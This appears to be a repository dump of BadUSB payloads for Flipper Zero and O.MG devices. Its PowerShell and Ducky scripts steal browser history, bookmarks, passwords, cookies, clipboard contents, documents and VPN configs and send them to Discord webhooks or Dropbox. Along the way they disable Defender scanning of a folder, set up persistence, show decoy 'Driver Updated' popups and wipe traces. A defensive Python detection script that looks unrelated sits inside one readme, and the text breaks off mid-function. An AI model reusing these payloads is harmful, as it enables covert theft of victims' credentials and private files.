* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: FlipperZero/payloads/cApS-Troll/a.ps1 ================================================ while (1){ Start-Sleep -Second 45 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') } ================================================ FILE: FlipperZero/payloads/cApS-Troll/payload.txt ================================================ REM Title: cApS-Troll REM Author: atomiczsec REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: Functions/placeholder ================================================ ================================================ FILE: Functions/tidal-log.ps1 ================================================ # Define the Discord webhook URL $webhookUrl = "https://discord.com/api/webhooks/XXXXXXX" # Define the path to the app.log file $appLogPath = "$env:USERPROFILE\AppData\Roaming\TIDAL\Logs\app.log" # Check if the file exists if (Test-Path $appLogPath) { try { # Use curl to upload the file to the Discord webhook $curlCommand = "curl.exe -F 'file1=@$appLogPath' $webhookUrl" Invoke-Expression $curlCommand Write-Host "Successfully uploaded the log 
file to the Discord webhook." } catch { Write-Host "An error occurred while uploading the log file to the Discord webhook: $_" } } else { Write-Host "The file $appLogPath does not exist." } ================================================ FILE: OMG/payloads/Bookmark-Hog/BH.ps1 ================================================ #Bookmark-Hog # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The chrome bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The edge bookmark file has not been found. 
" } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: OMG/payloads/Bookmark-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Bookmark-Hog

A payload to exfiltrate bookmarks of the 2 most popular browsers.

## Description

This payload will enumerate through the browser directories, looking for the file that stores the bookmark history.

These files will be saved to the temp directory.

Finally, Dropbox will be used to exfiltrate the files to cloud storage.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Bookmark-Hog/payload.txt ================================================ REM Title: Bookmark-Hog REM Author: atomiczsec REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Bookmark-Hog/placeholder ================================================ ================================================ FILE: OMG/payloads/Browser-Grab/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Browser-Grab

A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers.

## Description

This payload will exclude the C: drive on the device so Windows Defender doesn't flag the exe.

This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers.

Finally, Discord will be used to exfiltrate the files to cloud storage.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Admin privileges on the Device you are targeting
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Browser-Grab/b.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp # Download the exe and save it to temp directory iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe" # Execute the Browser Stealer cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait # Exfiltrate the loot to discord Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip Upload-Discord -file "$env:tmp\browserdata.zip" ================================================ FILE: OMG/payloads/Browser-Grab/payload.txt ================================================ REM Title: Browser-Grab REM Author: atomiczsec REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers REM Target: Windows 10 DELAY 2000 GUI r DELAY 1000 STRING powershell saps powershell -verb runas ENTER DELAY 1000 ALT y DELAY 1000 STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly ================================================ FILE: OMG/payloads/Copy-And-Waste/I.bat 
================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: OMG/payloads/Copy-And-Waste/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Copy-And-Waste

A payload to exfiltrate clipboard contents

## Description

This payload uses iwr to download 2 files

* I.bat
* c.ps1

**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup

**c.ps1** will sit in the AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click

The contents will then be sent to the discord webhook for viewing pleasure

For killing the script press both Ctrl buttons at the same time [It will resume at reboot]

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

### Executing program

* Plug in your device
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```

## Contributing

All contributors' names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Copy-And-Waste/c.ps1 ================================================ Add-Type -AssemblyName WindowsBase Add-Type -AssemblyName PresentationCore function dischat { [CmdletBinding()] param ( [Parameter (Position=0,Mandatory = $True)] [string]$con ) $hookUrl = 'YOUR DISCORD WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $con } Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body } dischat (get-clipboard) while (1){ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl) $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c) $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x) if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)} elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit} else {continue} } ================================================ FILE: OMG/payloads/Copy-And-Waste/payload.txt ================================================ REM Title: Copy-And-Waste REM Author: atomiczsec & I am Jakoby REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook REM Target: Windows 10, 11 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: OMG/payloads/Copy-And-Waste/placeholder 
================================================ ================================================ FILE: OMG/payloads/De-Bloater/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# De-Bloater

A payload to quickly get "Windows10Debloater"

## Description

This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...

## Getting Started

### Dependencies

* Windows 10

### Executing program

* Plug in your device

```
iwr -useb https://git.io/debloat|iex
```

## Contributing

All contributors' names will be listed here:

* [atomiczsec](https://github.com/atomiczsec)
* [Sycnex](https://github.com/Sycnex/Windows10Debloater)
* [I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)

================================================ FILE: OMG/payloads/Doc-Hog/d.ps1 ================================================ function Doc-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse $types = @{ "*.docx" = "Word"; "*.doc" = "Word"; "*.pptx" = "PowerPoint"; "*.xlsx" = "Excel"; "*.pdf" = "PDF"; "*.jpeg" = "JPEG"; "*.png" = "PNG"; "*.jpg" = "JPEG"; "*.csv" = "CSV"; "*.txt" = "Text"; } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object {$_.Name -like $type} if ($filteredFiles) { $zipFile = "$env:TEMP\$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } ================================================ FILE: OMG/payloads/Doc-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. 
DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Doc-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Doc-Hog

A payload to exfiltrate files such as PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV

## Description

This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
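For defenders, the launcher line above and the one in the Copy-And-Waste README share a recognizable process command-line shape: hidden window, execution-policy bypass, and a web download that is either handed to `iex` or written into the Startup folder. The following is an added example, not code from this repository: a Python triage function for process-creation command lines (for instance from Sysmon Event ID 1 or Security 4688 with command-line auditing). The sample lines, the `example.invalid` host and all function names are constructed for illustration.

```python
import re

# Substring indicators taken from the launcher lines shown in these READMEs.
WEB_DOWNLOAD = re.compile(
    r"(?<![\w-])(?:iwr|invoke-webrequest|irm|invoke-restmethod|wget|curl(?:\.exe)?)(?![\w-])",
    re.IGNORECASE)
INVOKE_EXPR = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)\b", re.IGNORECASE)


def is_param(token, full_name, min_len=1, aliases=()):
    """powershell.exe accepts any unambiguous prefix of a parameter name,
    so "-w", "-win" and "-WindowStyle" must all be treated as the same switch."""
    t = token.strip("\"'").lower()
    if not t.startswith("-"):
        return False
    t = t[1:]
    return t in aliases or (len(t) >= min_len and full_name.startswith(t))


def triage(cmdline):
    """Tag one process command line and decide whether it deserves an alert."""
    tags = set()
    if not POWERSHELL.search(cmdline):
        return {"tags": tags, "alert": False}

    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        value = tokens[i + 1].strip("\"'").lower() if i + 1 < len(tokens) else ""
        if is_param(tok, "windowstyle"):
            # "-w h" works because the value is prefix-matched against "Hidden".
            if value and "hidden".startswith(value):
                tags.add("hidden_window")
        elif is_param(tok, "executionpolicy", min_len=2, aliases=("ep",)):
            if value == "bypass":
                tags.add("exec_policy_bypass")
        elif is_param(tok, "noprofile", min_len=3):
            tags.add("no_profile")
        elif is_param(tok, "noninteractive", min_len=3):
            tags.add("non_interactive")

    if WEB_DOWNLOAD.search(cmdline):
        tags.add("web_download")
    if INVOKE_EXPR.search(cmdline):
        tags.add("invoke_expression")
    if STARTUP_DIR.search(cmdline):
        tags.add("startup_folder_write")

    # Alert only on the combination: each switch alone is common in admin scripts.
    alert = {"hidden_window", "exec_policy_bypass"} <= tags and bool(
        tags & {"web_download", "startup_folder_write"})
    return {"tags": tags, "alert": alert}


# Constructed sample command lines (not captured from a real host).
SAMPLES = [
    # download-and-execute-from-memory form used by most READMEs here
    r"powershell -w h -NoP -NonI -ep Bypass $pl = iwr https://example.invalid/stage.ps1?dl=1; iex $pl",
    # Copy-And-Waste form: download to the Startup folder for persistence
    r'powershell -w h -NoP -NonI -Ep Bypass "echo (iwr example.invalid/raw/CONSTRUCTED1).content > '
    r'"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";powershell "$env:APPDATA\c.ps1""',
    # benign scheduled job
    r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1",
    # same technique with unabbreviated parameter and cmdlet names
    r'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command '
    r'"Invoke-WebRequest https://example.invalid/a.ps1 | Invoke-Expression"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        result = triage(line)
        print("ALERT" if result["alert"] else "ok   ", sorted(result["tags"]))
```

Because the script body is executed from memory, the command line only shows the launcher; PowerShell script block logging (Event ID 4104) is needed to see what the downloaded script did.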

## Contributing

All contributors' names will be listed here

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/History-Pig/HP.ps1 ================================================ #History-Pig # See if file is a thing Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Chrome History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Edge History file has not been found. 
" } catch { throw $_.Exception.Message } } # Copy Edge History to Temp Directory to get sent to Dropbox else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: OMG/payloads/History-Pig/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# History-Pig

A payload to exfiltrate the history of the 2 most popular browsers

## Description

This payload will enumerate through the browser directories, looking for the file that stores the history

These files will be saved to the temp directory

Finally dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/History-Pig/payload.txt ================================================ REM Title: History-Pig REM Author: atomiczsec REM Description: This payload is meant to exfiltrate browsers history to a dropbox REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/OVPN-Hog/o.ps1 ================================================ function OVPN-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Drive = "C:" $Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse if ($Files) { $types = @{ "*.ovpn" = "OpenVPN" } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object { $_.Name -like $type } if ($filteredFiles) { $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } } ================================================ FILE: OMG/payloads/OVPN-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files looking for ".ovpn" files. 
Then create ZIPs with them, then send to a discord webhook. DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/OVPN-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# OVPN-Hog

A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).

## Description

This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Powershell-History/PH.ps1 ================================================ #Powershell-History # See if file is a thing Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) { try { Write-Host "The Powershell History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Powershell History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt" Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: OMG/payloads/Powershell-History/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Powershell-History

A payload to exfiltrate the history of the powershell console

## Description

This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console

These files will be saved to the temp directory

Finally dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Powershell-History/payload.txt ================================================ REM Title: Powershell-History REM Author: atomiczsec REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Printer-Recon/PR.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } function Clean-Exfil { # empty temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # delete run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Delete powershell history 